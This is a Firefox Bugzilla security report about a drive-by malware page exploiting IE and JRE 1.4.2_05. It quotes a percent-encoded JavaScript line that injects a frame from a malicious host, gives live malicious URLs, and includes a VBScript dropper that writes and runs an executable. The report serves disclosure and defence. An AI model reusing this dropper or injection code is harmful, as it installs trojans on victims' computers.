Closed
Bug 275429
Opened 20 years ago
Closed 20 years ago
JRE 1.4.2_05 exploit in the wild
Categories
(Firefox :: General, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 271559
People
(Reporter: jshpro2, Assigned: bugzilla)
References
()
Details
I beleive I have found a possible exploit, while browseing the web I came across a page that caused several notifications from my virus scanner: http://4arrowsoutfitters.com/crack/tradewinds/unlock/code/ (Go to the page at your own risk) I noticed the line: var str="%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%72%62%33%37%2E%63%6F%6D%2F%63%6E%74%2F%70%72%6F%63%65%73%73%6F%72%3F%61%72%61%6C%65%6C%22%3E%27%29%3B"; in the javascript, uppon decodeing that line it was printing a frame to: http://www.t058.com/inst/index.php?id=28129&c=Uji1i1ar0BI35vyd7nSV5v6JMUUFI0O3 This page appeared as if it was loading a java class to run some trivial code. I found code that looked like it was running some sort of exploit useing vbscript/ javascript/ and/or java An excerpt of one of the vbscripts it was running is: h0 = "" i = 1 Do While i < Len(c0) h0 = h0 & chr(cint("&h" & mid(c0, i, 2))) i = i + 2 Loop set wsh = CreateObject("WScript.Shell") path = "C:\\" set fs = CreateObject("Scripting.FileSystemObject") set ts = fs.CreateTextFile(path + "msinfo.exe", true, false) ts.Write(h0) ts.Close() wsh.Run(path + "msinfo.exe") self.close() It looks like they are downloading an executable to the victims computer (trojan.bytedownloader)... I sent the code to a friend of mine and when he ran it, he got a windows XP error that critical system files have been replaced with unknown files and that he needs to reinstall. I have tested this on my machine, I only get a notification from Norton that the file was prevented from downloading, it appears as if the author of the code has also implemented a counter to see how many computers have been infected. I do not intend to do any further investigation on my part. The reason I am reporting this to firefox instead of reporting it to sun microsystems of microsoft is because Firefox should have some security measure in place to prevent code like this from even running. Firefox is known for their security and I would expect an exploit like this to affect IE only, I hope this issue is resolved shortly. I do not have the time or motivation to send this report to any other places so if the correct place for me to contact was a virus center or something like that you have permission to foward it on with my email address. Regards, Josh jshpro2@gmail.com
Comment 1•20 years ago
|
||
The t058.com site contains several exploit attempts aimed at IE (ms-its: protocol object, the vbscript downloader you quote, a suspicious .gif file), and a java applet that apparently can take advantage of holes in Java at least up to JRE 1.4.2_05 (from other reports). There was a recently announced vulnerability in that JRE version, perhaps they use that. Turning off Java will protect you. Upgrading to JRE 1.5 or 1.4.2_06 would protect you if the exploit uses the known hole in 1.4.2_05, but that's less clear. I've seen a couple other sites that loaded the same trojan-laden frame from t058.com Really a JRE bug, but our users don't care whose fault it is. We want to roll out a system to warn users about known vulnerabilities in 3rd party software.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Summary: Exploit in browser → JRE 1.4.2_05 exploit in the wild
Whiteboard: DUPEME
Comment 2•20 years ago
|
||
*** This bug has been marked as a duplicate of 271559 ***
Group: security
Status: NEW → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•